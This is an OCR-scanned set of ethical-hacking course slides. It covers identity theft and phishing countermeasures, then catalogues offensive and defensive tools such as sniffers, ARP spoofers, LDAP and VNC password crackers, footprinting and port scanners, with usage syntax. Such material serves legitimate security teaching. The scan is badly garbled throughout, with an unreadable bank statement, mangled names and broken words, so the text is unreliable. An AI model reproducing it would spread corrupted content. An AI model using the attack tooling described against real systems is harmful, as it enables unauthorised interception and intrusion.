,MrSt CREDIT CAftD ^n^wn. 

Bank statement 



ACCOUNT MUMBEH NMtE 



2/'13/01 



3/os/ai 



CRCDIT LMI 

$1300.00 


CREDFT AVAHABtE 

SlOT i . ■?■£ 


NEW 9UUICE 

$40, QOO 


HIHMUH PAITMENT HJE 




?OLD 


POSTED 














iTEMENT 




















i/i£ 




RECTfCLSH 




12 14. $9 




1/13 


IflS 


KEEFORMU REST 


AHYTCMH LISA 


1230. SS 




1/iS 


i/ie 


□JtEAT 


EXFEx:racuiTic(«E 


E-ia City usa 


gg27. 




1/20 


1/21 


OIHC-OEL PETEDLEWI 


ftWYTO™ USA 


99i:.2C 




j/os- 


i/os 




■bt SUCK 


TIHWILLEUSA 





Purctiau* 

CrUlb, 



(•t 

(-1 

(•t 



1«B,80 
lis.. 24 



CumN aflwiint Eh* 



$40,000 



I 



nvjkNC£ Chunae suhmaav 
Annuil P«ic*nu^Hir(t 



puncriAscs 



fai CUUiMrSlnHHCtn: 



fKpsa mplio eri«k or nicnjy v4«r^«UK n Tmir FIrai B*!*. IrnluC* BCWHinl iiyn**rflii Ffwrf. 
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credit card 





Ahhh!!! Somebody 
I stole my identity!! 



J 



What e se..oh my God! 



© Fake Steven can apply for a new passport 
© Fake Steven can apply for a new bank account 
© Fake Steven can shut down your uti I ity services 



© FAKE STEVEN CAN MAKE THE LIFE OF 
REAL STEVEN HELL 

© Scary hah? 
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"One bit of personal 
information is all someone 
needs to steal your identity 



ff 



Identity theft- serious problem 




© Identity theft is a serious 
problenn today 

© Thenumber of violations has 
continued to increase 

© Securing personal infornnation 
in the workplace and at honne, 
and looking over credit card 
reports are j ust a few ways to 
nni n i nni ze the r i sk of i denti ty 
theft 
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http://www.consumer.gov/ idtheft/ 




► Consumers 

^ En Espariol 

► Law EnfbrcQment 
^ Msdiia Resources. 



Welcome to the Federal Trade Commission 

Your Na tionat Resource about Iden tity Theft 

This website is a one-stop national resource to learn about the 
crime of identity theft. It provides detailed information to help 
you protect yourself from identity theft, and the steps to take if 
it occurs. It is also a comprehensive reference center - for 
consumers , businesses , law enforcement , and the media - 
with access to specific laws, contact information, and resources 
nrH f^-j eral government agencies. 



National Data 



Stale Data 



Reports and Testimony 



Laws 



smous crime. How does it happen? 

rs when someone uses your personal 
it your permission to commit fraud or other 
■;an't entirely control whether you will become 
steps you can take to minimize your risk . 




One missing puzzle piece can dramatically change a puzzle's 
characteristics. The same is true with a person's identity - one bit 
of personal information is all someone needs to steal your identity. 
This website provides detailed information to help protect yourself, 
and the steps to take if identity theft occurs. 

If you thinl< your identity lias been stolen. Here's what to do: 



1. Contact the fraLid departments of any one of the three consumer 
reporting companies to place a fraud alert on your credit report. The 



Fil« a Complaint 



Ne^fi From the FBI 



Take Lharge; Fighting 



The't 'PDF 4 SME'i 




Remed'.'inq the Effects 
of Identit'.. Theft 
I'PPF 24Ii:B'i 

What To Do IF Your 
Personal InFormation 
Has Been 
Compromised 
rpDF L52KBJ 



How Not to Get 
Hooked b-.- a Phi; 



hing 



(PDF 164KBJ 



InFormation 
Compromise ! 
Business Guidance 
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Countermeasures 



© Be suspicious of any email with urgent requests for 
personal financial information 

© Don't use the I i nks i n an emai I to get to any web page, if 
you suspect the message might not be authentic 

© Cal I the company on the tel ephone, or I og onto the 
website di rectly by typi ng i n the Web address i nto your 
browser 

© Avoi d f i 1 1 i ng out forms i n emai I messages that ask for 
personal financial information 

© Always ensure that you're usi ng a secure website when 
submitting credit card or other sensitive information via 
your Web browser 
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Ethical Hacking and 
Countermeasures 



Additional Tools 




I 



©Thismoduleisabrief study of all theCEH Additional Tools 
©The tools are categorized according to their functionality 



• Analyzing Tools 

• Blue Tooth Tools 

• Brute Force/ Password 
Cracking Tools 

• Footprinting Tools 

• Forensics Tools 

• Honeypots 

• Scanning Tools 

• Spoofing Tools 

• Wireless Tools 

• Miscellaneous Tools 
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Analyzing Tools 




Blue Tooth Tools 



^Brute Forc^ Password 
Cracking Tools 



H oneypots 



Forensics Tools ^ 



Footprinting Tools 



Scanning Tools 



■► Spoofing Tools 



Wireless Tools 



Miscellaneous Tools 
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Ethical Hacking 



Analyzing Tools 



Analyzing Tool: Acid ab 



© PHP-supported analysis engine 

© Search and process database against foreign 
intrusions 



© The main features it provides are: 

• Query-builder and search interface 

• Packet viewer (decoder) 

• Alert management 

• Chart and statistics generation 
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Analyzing Too : AimSniff 



© Si mple and diagnostic tool that observe and archive 
AOL I nstant |V| essenger across the networl< 

© Dump or read PCAP files and parse them for I M 
messages 

© Dumping can also be made to MySQL database or 
STDOUT 
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Analyzing Tool: Bing 



© Based on the pi ng command 

© Bandwidth measurement tool between two 
poi nts 

© Computes round tri p ti me between two I i nl<s or 
two pacl<ets 
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© Converts Switched network onto shared 
network and promotes sniffing 

© Compiles under Li nux and requi res I i bnet and 
I i bpcap 

© Provides ARP spoof i ng and switch i ng gateway 
routers and provides many other functions 
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Analyzing Tool: Darkstat, Driftnet 



© Darkstat 

© Network traffic analyzer 

© Runs in background and collects statistics regarding 
network 

© Sniffs data packets and shows them graphically 

© Driftnet 

© Sniffs J PEG images in the network 
© P rovi de d i scri mi nati ons i n the i mages 
© Runs on Unix and requires special files 
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I 



© Ettercap-gtk 

© M uiti purpose gtk version of the Ettercap sniffing tool 

© Sniffs or i ntercepts data on the switched networl< and makes 
network and host analysis 

© 1 1 does active and passive analysis of many protocols 

© Farpd 

© Background process claiming all theidleand unassigned addresses 
on the network 

© Responds ARP request by sending I P and hardware MAC address 
of server i nterf ace 

© Basic work isfor network monitoring or simulation purposes 
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Analyzing Tool: Filesnarf 



© Sniff files from NFS traffic 

© Restores the sniffed fi le in the current worl<ing directory 
© Syntax: 

filesnarf [-i interface] [ [-v] pattern [expression] ] 

- i i nterf ace Shows the i nterf ace to I i sten on 

-V "Versus" mode I nvert the sense of matchi ng, to select non-matchi ng 

files. 

pattern matchi ng Shows regular expression for fi lename. 
expression Shows a tcpdump(8) filter expression to select traffic 

to sniff. 
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Analyzing Tool: Hammerhead 



© stress testi ng tool that perform load testing 

© Testing is done on the specified machine by 
simulating load 

© Support many configurations and performs 
scenario based loading 

© Syntax 

hammerhead [ options ] [ resultsFile ] 
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Analyzing Tool: Httprint 



© Fingerprinting tool that exactly determine web 
servers and their attached devices 

© I ts mai n features are: 

• Recognizes web servers i n spite of the banner stri ng and any other 
confusion 

• L i sts devi ces such as pri nters, routers, swi tches, wi rel ess access poi nts, 
etc.on the web server 

• Signatures can be altered and newly added to the database 

• HTTP BOland 302 movements can be redirected 

• i mport web servers from nmap network scans and its xml output fi les 

• Reports in HTM L, CSV and XM L formats. 

• Availableon Linux, Mac OS X, FreeBSD (command lineonly) and 
Win32 (command line and GUI). 
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Analyzing Tool: Icmpinfo 



© Sniffs I CM P messages col lected on the I i ve host 
© Detects various threats and network problems 
© Syntax: 

icmpinfo [-v[v[v]]] [-n] [-p] [-s] [-1] 

© Output is shown as follows: 

MMM DD HH:MM :SS I CM P_type[ sub-type] <sender_ip 
[sender_name] >unreach_ip [unreach_name] 
sp=source_ port dp=dest_ port seq=sequence 
sz=packet_size 
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Analyzing Tool: IDSwakeup 



© Bourne shell script and collection of tools 
© Test network intrusion detection systenns 
© H as two innpli cations: 

• I DSwakeup that launch hping2 or iwu. It gives the option to 
select attack to be done 

Syntax: 

./IDSwakeup <src addr> <dst addr> [nb] [ttl] 

• . I wu that throws a buffer as a datagrann and alters the source 
address, the destination address, the ttl (to have short TTL), 
N b is the nunnber of ti nnes to send the sanne datagrann. 1 1 
requires I ibnet Ix. 

Syntax: 

. /iwu <srcIP> <dstIP> <nb> <ttl> <ip-datagram> 

Copyri ght © by BC-Cbunc i I 
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© Listens network traffic and shows current 
bandwidth used by the host system 

© Requires libpcap and libcursesfiles 

© Suppress the display of DNS traffic by using 
fi Iter codes so that heavy traffic on the networl< 
can be avoided 

® Syntax: 

iftop -h I [-nNpbBP] [-i interface] [-f filter 
code] [-F net / mask] 



BC-Council 



Copyright © byBC-Council 
All Rights reserved. Reproduction is strictly prohibited 



L i 



Analyzing Tool: IppI 



© Daemon process logs information about IP 
pacl^ets coming in and sending out of the host 
computer 

© Logs incoming TCP connections, 
U DPdatagrams and I CM P pacl<ets sent to a host 

© Major limitation of it is that it is not easily 
configurable 

© Syntax: 

ippl [\-hn] [-C file-name] [\-\-help] [\-\- 
nodaemon] [\-\-config file-name] 
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© Analyzer or sniffer that works on Ethernet 
protocol 

©Main features include: 

• Supports XWi ndows with Gtk output 

• Displays one connection or whole traffic on the network station 

• Autonnatically identifies network stations 

• I ncludes a protocol description language to add other protocols 

• Displays real tinne statistics on the network or on a particular 
station 

• Allowsto-diskcapturesof nnostfrannetype/ protocol connbos. 

• Al lows to-disk captures of unidentifiable packets 
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Analyzing Tool: Nast 



© 

© 
© 
© 
© 
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packet interceptor/ logger and a LAN analyzer based on Libnet and 
Libpcap 

I ogs the packets found on network i nterf ace 
Works in both nornnal and pronniscuous nnode 
Sniffed data can be saved in a separated file 
M ai n features i ncl ude: 

Build LAN hosts 11 stand follow a TCP- DATA stream 
Find LAN i n tern et gateways 
Reset an established connection 

Perform a single half-open and multi half-open portscanner 
Find I ink type (hub or switch) 
Catch daemon banner of LAN nodes 
Control arp answers to discover possiblearp- spoofing 
Byte couting with an optional filter 
Write reports logging 

Copyright © byBC-Council 
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Analyzing Tool: Ngrep 



© AppI i cabi e at the network I ayer 

© Some added features of GN U grep 

© Permitsregular or hexadecimal expressions to match 
against data payloads of pacl<ets 

© Identifies TCP, UDP and I CM P across Ethernet PPP, 
SLIP, FDDI, Token Ring and null interfaces, and 
understands bpf filter logic in the same fash ion as more 
common packet sniffing tools, such as tcpdump and 
snoop 

© Syntax: 

ngrep <-hXViwqpevxlDtT> <-I0 pcap_dump><-n num> <-d 
devX-A num> <-ssnaplen><match expression> 
<bpf filter> 

Copyri ght © by BC-Cbunc i I 
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Analyzing Tool: Netsed 



© Handy and simple tool 

© Change the contents of packets arriving in the 
network 

© Used in following applications: 

• black-box protocol auditing 

• fuzz-alikeexperinnents, integrity tests 

• other common appi i cati ons I i ke fool i ng other peopi e, content 
filtering, etc 
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Analyzing Tool: N streams 



0 Deter mine the IP Streams that are occur ring on 
a networlcfrom a non-user friendly tcpdump 
output of several megabytes 

0 Nstreams can read the tcpdump output directly 
from stdin, or from a file 

0 Syntax: 

nstreams [ -v ] [ -c nstreams-services ] [ -n 

nstreams- networks_f ile ] [ -N [ -i ] [ 
-I ] ] [ -r ] [ -O output [ -D if ace ] [ 
-Y ] ] [ -u ] [ -U ] [ -B ] [ -f 
tcpdump_file ] [ -1 <iface> ] tcpdump 
output ] 
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Analyzing Too : Packit 



© Network auditing tool that nnal<es pacl<et analysis and 
i nj ecti on tool 

© Capability to customize, inject, monitor, and 
manipulate IP traffic 

© Define (spoof) all TCP, UDP, ICMP, IP, ARP, RARP and 
Ethernet header options 

© Used in testing firewalls, intrusion detection systems, 
port scanning, simulating network traffic and general 
TCP/ IP auditing 
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© Network protocol analyzer based on SSLv3/TLS 

© Recognizes TCP connections on the network 
i nterface and treats it I i ke SSLv3/TLS traffic 

© Decodes the records and shows i n a textual 
form to stdout 

© Can decrypt the connections and display the 
appi i cati on data traff i c 
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AnalyzingTool: Tcpflow 



© Protocol Analyzer or Debuggi ng tool detains the 
information present on TCP connections 

© Stores the data as summary of packets and not the 
actual data 

© Rearranges data packets by sequence numbers and 
saves them i n separate f i I e 

© Based on the LBL Packet Capture Library and possess 
rich filtering expressions 

© Syntax 

tcpflow [-chpsv] [-b inax_bytes] [-d debug_level] [- 
f max_fds] [-i iface] [-r file] [expression] 
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© Program that captures tcp data stream on the 
TCP connections and stores them on the 
separate f i I es 

© Prints data on the console in different formats 

© Syntax 



tcpick [ -a ] [ -n ] [ -C ] [ -e count ] [ -i interface 



I -r file ] [ -X timeout ] [ -D ] [ -Fl | -F2 ] [ 
-yH I -yP I -yR | -yU | -yx | -yX ] [ -bH | -bP 

I -bR I -bU I -bx I -bX ] [ -wH[ub] | -wP [ub] | 
-wR[ub] I -wU[ub]] [ -V [ verbosity ]] [ -S ] [ 
-h ] [ --separator ] [ -T | -Tf [ number ] ] [ -E 
I -Ef [ number ]] [ -Pc | -Ps ] [ "filter" ] [ — 
help ] [ — version ] 
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Analyzing Tool: Tcpslice 



© U ti I ity that extracts porti ons of packet traced from 
tcpdump files 

© Also paste together several such files 

© U ses I i bpcap for provi di ng i nterface to the user 

© Basi c operati ons i s to copy data packets to the consol e 
whose tinnestannps come within a given range 

© Syntax: 

tcpslice [ -dRrt ] [ -w file ] [ start-time [ 

end-time ] ] file . . . 
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AnalyzingTool: Tcpspy 



© Provides details regarding incoming and 
outgoi ng TCP/ 1 P connections 

© Commonly used by the administrators 

© Provides username, local address and port, 
remote address and port, and, optionally, the 
executabi e f i I ename 

© Doesn't require I ibpcap functions 
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Analyzing Tool: Tcptrace 



© Used as a bridge between client and server 

© Requires local port number, destination server, 
and destination port number 

© Provides information on each connection like 
elapsed time, bytes and segments sent and 
received, retransmissions, round trip times, 
window advertisements, througliput, etc 

©Also produces number of graplis for furtlier 
analysis 

© Works with all the text based I P protocols 
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Analyzing Tool: Tethereal 



© Analyzi ng tool that detai n packets fronn the network or the stored 

file and analyzes and restores in the file or displays on the console 
© Displays details in the I ibpcap file format 
© Read from f i I es havi ng var i ous f i I e formats 
© Syntax: 

tethereal [ -a capture autostop condition ] ... [- 

b capture ring buffer option] ... [ - 
capture packet count ] [ - 
d <layer type==<selector>, <decode-as 
protocol> ] > [ -D ] [ - f capture filter ] 
[ -file format ] [ -h ] [ - 

i capture interface ] [ -1 ] [ -L ] [ -n ] 
[ N name resolving flags ] [ - 
o preference setting ] ... [ -p ] [ -q ] 
- r infile ] [ -R read (display) filter ] 
[ -s capture snaplen ] [ -S ] [ - 
t time stamp format ] [-T pdml | psml | ps | text ] 
[ -V ] [ -V ] [ -w savefile ] [ -x ] [ - 
y capture link type ] [ -z statistics ] 
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Analyzing Tool: Urisnarf 



© Displays all theURLssniffed from HTTP traffic 
i n the common log format 

© Output can be used di rectly by the log analyzers 

© Partof dsn iff tool 

© Syntax: 

urisnarf [-n] [-i interface] [ [-v] 

pattern [expression] ] 
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Ethical Hacking 



Blue Tooth Tools 



Blue Tooth Tool : Btscanner 



p L. i . i , i 



-Ease Address: 
LS Address | 

S3 00:60:57: 
28 00:60:57: 



33 oo:OE:6D: 



72 00:60:57 
S3 00:60:57 
65 00:60:57 
39 00:01:E3 



-Devices found: 7 



00:09:DD:e:e:< 

Clk Off 
0x0573 
0x6195 




Class 

0x520204 

0x500204 



Naivie 

Nokia 6310i 
n/a 



0x5ad5 0x520204 n/a 



0x39af 
0x5d2G 
0x2elf 
0xlc4f 



0x500204 
0x500204 
0x500204 
0x720204 



n/a 

Nokia7650 
n/a 

0001E36C50Ffi 



© Extracts information from the Blue Tooth device 

© Based on BlueZ Bluetooth stack 

© Extracts H CI and SDP information 

© Maintains an open connection to monitor 

© Containsalistof IEEE GUI numbers and class 
lookup tables 
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BlueTooth Tools : Bluez-pin, Obexftp 



© Bluez-pin 

• User interface Blue 
Tooth devi ce 

• Enters the PIN code 



© Obe>cftp 



OBject Exchange File 
Transfer Protocol 

Supported by 
OpenOBEXJrDA, 
BlueTooth and Serial 

Easy accessing in 
mobiles 
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L i 



Blue Tooth Tool 



© Scri pt wrapper 

© Places X window on the 
basic nniniconn pacl<age 

© A software sol ution to 
configure router 
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Hi meat CoMund S t— o rtj 

cait tiB called by CTH.-fl <kfiy> 
tbin Finctiona Other FLnct.faw 



f tiling ctlnectcnj^.D 
Send Files,, .,,»»»»S 
COM Pdr-aKters^.^.P 
C^ibre an/off ttt-tJ- 
send br»di.^^^^^^^^J- 
Terninal HHilaticn.T 



rui script (Go)..«.G 
Receive Files,. ..,.R 

Add lineFeed A 

Hangi4>,,,,,,,,,,,,,H I eHit and reaiA. 



I Clear Screen...... 

I ctbiTigu^ Hinicai. 
I Jmp to a 



initialize HcHfaii,,,H 
rui Keniit,,,,,,,,,K 
local Echo an/off..E 



Quit yith no reset 
I Cirscr ken Hife... 
I Help 
I scroll 



iKk. 



Salect fuictim or press Bitsr for mna J 

Ur^itten by Hi quel vw Smorflrdu^ 1391-1994 



CTRL-H Z fct help I ZHOO 8HI I HQft I Hmicw 1.60 iS^j I V1100 I OFFL I NE 
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Ethical Hacking 



Brute Force/ Password 
Cracking Tools 



Brute Force Tool : KOId 



© Knocking On Ldap's Door 

© Dictionary attack against LDAP servers 

© Tries to fi nd tine password 

© Prevents 'cannot assign requested address' stuff 
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Brute Force Tools : Bfbtester, Smb-nat 



I 



© Bfbtester 

• bfbtester is Brute 
Force Binary Tester 

• Checl<s the bi nary 
programs 

• All overflows in a 
software cannot be 
tested 

• Tested on FreeBSD, 
Linux and Solaris 

• Alerts the user against 
usi ng unsafe tempf i I e 



© Smb-nat 

• NetBIOS auditing tool 

• Performs security 
check on NetBIOS file 
servi ces 

• Enumerates the 
shares 

• Makes a break- in 
attempt 
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Brute Force Tool : Vncrack 



© Si mi I ar to crack VN C 
© Fixed key decrypti on is done 
© Replaces older versions 
© Cooperates with PHoss 
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Ethical Hacking 



Footprinting Tools 



FootprintingTool :Argus-client 



© An I P network transaction audition tool 
© Works on LINUX and UNIX platform 
© Read network datagram 

© Can trace the network problems 

© Argus- server is a appropriate clients for argus 
cl i ent . 
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FootprintingTool : Argus- Server 



© IP network transaction auditing tool 

© Works on Linux /Unix platform. 

© Reads network datagram 

© Can trace the network problems 

© Argus- client is a appropriate clients for argus- 
server. 



B3-Council 



Copyright © byC-Council 
All Rights reserved. Reproduction isstrictiy proiiibited 



FootprintingTool : Arpd 



© Determine the Reversed Address Protocol 
Daemon. 

© ManageARP Table 

© Useful for sites with lager network segment. 
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FootprintingToo :Arpfetch 



© Fetch the address pairing between Ethernet and 
IP. 



© Gather the i nformation for Arpsnmp 
© Two command arguments are used 

• Host argument 

• Cname 
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FootprintingTool : Arping 



© Send ARP / 1 CM P request to specified host 
© Shows the H ost 's response 
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FootprintingTool : Arpwatch 



© Monitor the network traffic and keeps the track 

of Ethernet/ 1 P address pairings. 
© Sends alert if ant clianges liappened in network. 
© It createthearp.dat file to maintain the record 
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Footpri nting Tools : dcetest, Dlint 



Dcetest 

© Provides MSR PC end point information. 
© Works on UNIX platform also. 

Dlint 

©Explore specified DNS zone 

©Able to explore sub zones under given zone 
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Footpri nting Tools : dnswalk,FFP 



Dnswalk 

© DNS debugger 

© Transfer the zone of given domai n 
FFP 

©Generate F uzzy F i ngerpri nt 

© F i nger pr i nts resembl e the target's f i ngerpri nt 
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L i 



i 



Footprinting Tools: Finger, fpdns 



Finger 

© Provides the information about the system user 
© Gives user friendly repots 

Fpdns 

© Responds to a borderlineDNS queries 

©Determine the brand and version of name 
server 
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Footpri nting Tools : fping, Host 



fping 

© Determine which host is up 

© |V| any host can be specified on command line to ping 

© Used in scripts 

© Worl< in round robin fashion 

Host 

© Queries the DNS server for domain name and zones 
© Able to determine original version of host 
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FootprintingTool : I trace 



© Can trace the path of packets moves through the 
I nternet 

© Gather the information about packet I ike origin, 
desti nation and ti me of sent etc. 

© H el ps to trace the ori gi n of Deni a! - of servi ce 
attack . 
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Footpri nting Tools : MTR , Net mask 



MTR 

© Determine the network connection between host 

© Can be compi led without support conserves disl< space. 



Netmask 

©Determine the network mask of specified host. 
©Can change the netmask format. 
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FootprintingToo : Nmbookup 



© A part of thesamba(7) suite. 

© Direct the name queries to specified IP 
broadcast domain. 

© Queries execute over UDP. 

©Uses many option to perform various other 
tasl<. 
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FootprintingTool: Queso 



© Recogn i zes and I i sts operati ng systems 

© I dentifies from the TCP packet signature and not from 
banners, daemon versions, etc 

© Config fi le shows about 80 operati ng systems with thei r 
versions 

© Locate Linux Kernel version and TCP replies from 
devices like routers, terminal servers, printers, etc 
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FootprintingTool: nwatch 



© Security tool that deals with network monitoring, policy 
developnnent, and certain types of intrusion detection 

© Verify I P addresses by checki ng host detai Is and services for a 
given amount of time 

© Organizes traffic I ike a port scanner 

© I ts opti ons are: 

d or -device <device-nanrie> Open the specific device. If not specified, nwatcli 

( I i bpcap) wi 1 1 choose an i nterf ace. 

-o or -output <filename-or-:tag> Out put is written in the specified file or 

a data store tag. 

-h [!]<host ranges>[:<port ranges>] Specifies host range and ignores the 

other network traffic. 

[-fi I -flush-interval <seconds>] Determines the flush interval to 

<seconds>. Default is 300 (5 minutes). 

[-si I -sample-interval <seconds>] Determines the sampling interval to 

<seconds> Default is 3600 * 24 (Iday). 
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FootprintingTool: Smb4k 



© Samba software package that share browser 
KDE 

© Helps in browsing local network neighborhood. 
© I ts mai n features are: 

• Scanning for (active) worl<groups, hosts, and shares 

• Mounting and immediateunmountingof SMB and CIFSshares 

• Access to thefi les of a mounted SM B or CI FS share usi ng 
Konqueror 

• Auto-detection of external mounts/ unmounts 

• Remounti ng of recently used shares on program start 
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FootprintingTool : Smbget 



© Downloader for SM B/CI FS protocol 
© I mportant features are: 

• Recursive downloading 

• Supports SIVIB URLs 
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FootprintingTool : Socat 



© Multipurpose relay for bi-directional data 
transfer 

© Command line utility 

© Socat can be used as: 

• TCP port forwarder 

• External socksifier 

• Attack! ng weak f 1 rewal I s 

• Shel 11 nterf ace to U n 1 x sockets 
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Footprinting Tools : Traceproto, 
Trace route- nanoo 



© Traceproto 

• Traceroute repi acement i n 
C 

• SupportsTCP, UDP, ICMP 
traces 



© Traceroute-nanog 

• Determines route of 
packets i n TCP/ 1 P 
networks 

• Requires root privileges to 
open a socket 

• M al i ci ous user can access 
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FootprintingTool : Tcptraceroute 



© utilizes TCP for tracing 
© Detects and tests fi rewai I rul 
© Accesses control I i sts 
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Footpri nti ng tool : Ti nysnmp 



© Implements the SN M Pvlprotocol specified in 
RFC 1157 

© I t's a package holdi ng i mplementations of 
SNMP utilities available in many SN MP 
implementations. 
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FootprintingToo :Tkmib 



© A Net SNM P M I B browser 
© Queries remote device for SNIViP information 
© Provides a grapliical front-end for SNIV| P tools 
© Helps in browsing M I B tree 
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Ethical Hacking 



Forensics Tools 



Forensic Tool : Autopsy 



© Forensic Browser and graphical interface 
© Command line Forensic AnalysisTool 
© P rovi des a f i I e manager 
© HTM L based browser 
© Supports Linux platform 
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Forensic Tool : Biew 



© Binary VIEW 
© Features of biew 

• Advanced file 
viewer 

• Built-in editor 

© Workson platfornns 

• DOS 

• Win32 

• OS 2 

• Linux 

• Unix 
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Forensic Tool : Clamav 



© GPL anti virus tool kit for Unix 

© I ntegrates with mail servers 

© Command line scanner 

© M uiti threaded daemon 

© Detects around 36000 viruses, worms 
and trojans 

© Built in support for zip, Gzip, mbox, etc., 
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Forensic Tool : Dd rescue 



© Data recovery tool with automated operation 
© Copi es data from one f i I e to tlie otiier 
© Can copy bacl<wards 
© Two blocl< sizes are used: 

• Large (soft) block size 

• Small (hard) block size 

© Tlie differences of tiiis tool are: 

• No character conversion 

• Does not abort errors 

• Does not truncate the output file 
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© 


Multi purpose tracker 


© 


Partial decompiler 


© 


No source is required 


© 


Heloful for black boxtestinq and evaluation 


© 


Features of Fenris: 




• Traditional interactive debugging 




• F i ngerpri nts fundi ons i n stati c bi nar i es 




• Reconstructs synnbol tables 




• Text based and graphical is delivered 
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Forensic Tool : Foremost 



I 



© Automati c F i I e recovery 
program for Linux 

© Referred as data carving 

© Works on image files 

© Add on for TASK suite 

© Supports operating 
systems: 

• Linux 

• BSD 

• Unix 
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ForensicTools : Gtkrecover, wipe 



© Gtkrecover 

• GUI for recover 

• Undeletesfileson ext2 
partitions 



GtkRecover V0.2 based on recover- 1,0a 
(C) 1999, 2000 by Tom Pycke 



- □ X 



Filter parameters: 



Please enter the partition's device name 



In what year did you deiete the file? (eg, 1999): 



T 



'1980 = uni<nown) 



1980 



in what month did you deiete the file? 



unknown 



On which day of the weei< did you delete the flie? 



i 



unknown 

What was the first possible day of the month on which you deleted the fiie? ( 1 



T 



1 

What was the iast possible day of the month on which you deleted the fiie? ( 1 - 



Quit 



Find It 
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© Wipe 

• Securefile wiping tool 

• Deletes data by 
overwriting 

• Supports on Linux 
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Forensic Tool : Sleuthkit 



© Digital Forensic Tooll<it 

© Recovers deleted files and reconstructs 
scenarios 

© Previously known as TASK 

© Collection of Unix based command line file 
systems and media management forensic 
analysis tools 

© Tested on Linux, MacOSX, Open & FreeBSD, 
Solaris and CYGWIN 
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I 

© The Coroner's Tool kit 

© Unix based command line tools 

© The other tools i n tct are: 

• Grave robber 

• Mactimeand lis 

• Lazarus and unrm 

• findkey 

© Limitation of tct: 

• File system tools operate only at block and 1 node 
layer 

• Platform dependency 



Forensic Tool : Tct 
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Forensic Tool :Testdisk 




Jljt^ -la-ML'h.'- t.'^M.-M.-M M LIL-A- Ik^ ■Lltlt.-i-'jy^H^^^^E Wi-A-Jil I M jLtlL- 



lestDisk 5.4, Data Recouerv Utility, Nouenber 2004 
Cliristophe GRENIER <grenierPcg3ecurity.0rg> 
http : //wuu . cgsecur ity . org 



toisk /deu/sda - CHS 14593 255 63 



114470 MB 



Part it ion 

1 * HPFS - NTFS 

2 P HPFS - NTFS 

3 E extended LBA 

5 L HPFS - NTFS 

6 L HPFS - NTFS 

7 L FnT32 LBfl 

8 L FflT32 LBfl 



0 11 181G 254 63 

1817 0 1 3633 254 63 

3634 0 1 14592 254 63 

3634 1 1 6303 254 63 

6304 1 1 14517 254 63 

14518 1 1 14586 254 63 

14587 1 1 14592 254 63 



Size in sectors 

29190042 [50_01i36] 

29190105 [Test] 
176056335 

42893487 [Nadine] 

131957847 [Sabine] 
1108422 

96327 [BOOTEN] 



[ Quit ] [Search* ] 



Urite partition structure to disk 



© Checks and Undeletes the partitions 

© Recovers lost partitions 

© Works with FAT12, FAT16, FAT32, NTFS, 
EXT2FS/EXT3FS, Linux swap, etc., 

© Features for both novices and experts 

Copyright © by BC-Cbunci I 
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Ethical Hacking 



H oneypots 



H oneypot : I mpost 



© Network protocol security auditing tool 

© M uiti purpose network debuggi ng tool 

© H istory is maintained for further reference 

© Supports Linux, Unix, MacOSX, FreeBSD and 
Open BSD 

© Two ki nds of operati ng modes are used: 

• H oneypot 

• Packet sniffer 
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Honeypots : Labrea, iisemulator 



© labrea 

• Also called as sticky 
H oneypot 

• Creates virtual server 

• Latest versions are tested 
on Windows 98/ 2K, 
Linux, FreeBSD and 
Solaris 

• Runs when: 

- LaBrea <options> <BPF 
filter> 



© iisemulator 

• Ennulatesan IIS web 
server 

• Used with Honeypot- 
deploynnent software 

• Creates a vi rtual server 
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Ethical Hacking 



Scanning Tools 



Scanning Tool : AB 



© Performs testi ng of web pages, sites and dynamic scri pts 
© Creates single or multiple requests per second 
© Generates nice result reports 
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Scanning tools : ADM-smb, Knocker 



ADM-smb 

© Retrieves NetBIOS name of the machine 

© Performs a complete audit of samba on a host that is 
provided 

Knocker 

© TCP security port scanner written in C, using threads 

© Analyzes hosts and the network services which are 
running 
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Scanning Tool : Amap 



© I gnores the port numbers and probes I P ports for 
running protocols 

© Locates services running on non-standard ports 

© Retrieves information about ports that don't display 
outputs 
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Scanning Too : Ass 



© Autonomous System Scanner, designed to fi nd the AS of the 
router 

© Helps Routing Protocols to distinguish between various 
routing "domains" and different means for communication 

© Works as a TCP port scanner 
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Scanning Tool : IKE-scan 



© Scans I P addresses for VPN serversbysendingaspecially crafted 
I KE packet to each host withi n a network 

© Monitors retransmission packets 

© Exploits transport characteristics in the I nternet Key Exchange 
(I KE) service 



u 



P' C:\WINNT\system32\cmd.eKe Z^^^^H 
Usage: i]<e-scan [options] [hosts...] 

Target Jiosts nust be specified on tlie command line unless tlie — file option is 

given, in uhich case tJie targets are read from the specified file instead. 

The target hosts can be specified as IP addresses or hostnanes . Vou can also 
specify IPnetworlt/bits <e.g. 192 .168 .1 .0/24> to specify all hosts in the given 
netuork <networl( and broadcast addresses included^, and IPstart-IPend 
<e.g. 192. 168. 1.3-192. 168. i.27> to specify all hosts in the inclusive range. 

These different options for specifying target hosts may be used both on the 
command line, and also in the file specified uith the — file option. 

In the options belou a letter or uord in angle bracl^ets lil^e <f> denotes a 
value or string that should be supplied. The corresponding text should 
indicate the meaning of this value or string. Uhen supplying the value or 
string, do not include the angle bracl<ets. Text in square bracltets lilte [<f>] 
mean that the enclosed text is optional. This is used for options uhich tal<e 
an optional argument. 

Opt ions : 

— help or — h Display this usage message and exit. 

— file=<fn> or -f <fn> Read hostnames or addresses from the specified file 
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© An advanced open- 
source platform for 
developing, testing, and 
using exploit code 

© A powerful tool for 
penetration testing, 
exploit development, and 
vulnerability research 

© Supports Perl language 
and allows the 
Framework to run on 
almost any Unix-like 
system 



BC-Council 




Advanced Module Options 



* DirectSNB Optional DATA ^^0 | Advanced exploit option 

Use the dired SMB pcotocol [445/tcp] instead of SMB over NetBIOS 



* FragSize Optional DATA | 1024 | Advanced exploit option 

The applicatisn fragment size to use with DCE RPC 
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Scanning Tool : nmapFE 



© Performs port scanning including remote OS detection 
via TCP/ 1 P fi ngerpri nti ng, pi ng sweeps, upti me 
calculation, protocol scans, etc 

© Connects to open ports and i nterrogates them for 
information using probes to retrieve detail assessment 
of what is really running on the system 



cv" cmd.exH (running as PLAYGROUND\root) 



E:S>cd nnap 

E:\nnap>nnap -fl -T4 scanne . insecure . org 

Starting nnap 3.48 < http : //www. insecure .org/nnap > at 2003-12-20 03:20 Pacific 
Standard Tine 

Interesting ports on scanne . insecure . org <205 .217.153 .55> : 

CThe 1652 ports scanned but not shown below are in state: filtered> 

PORT STfiTE SEPUICE UERSION 

22/tcp open ssli OpenSSH 3.1pl (protocol 1.99> 

open sntp qnail sntpd 



open 
open 
open 
open 



ssli 
sntp 
dona in 
littp 



ISC Bind 9.2.1 

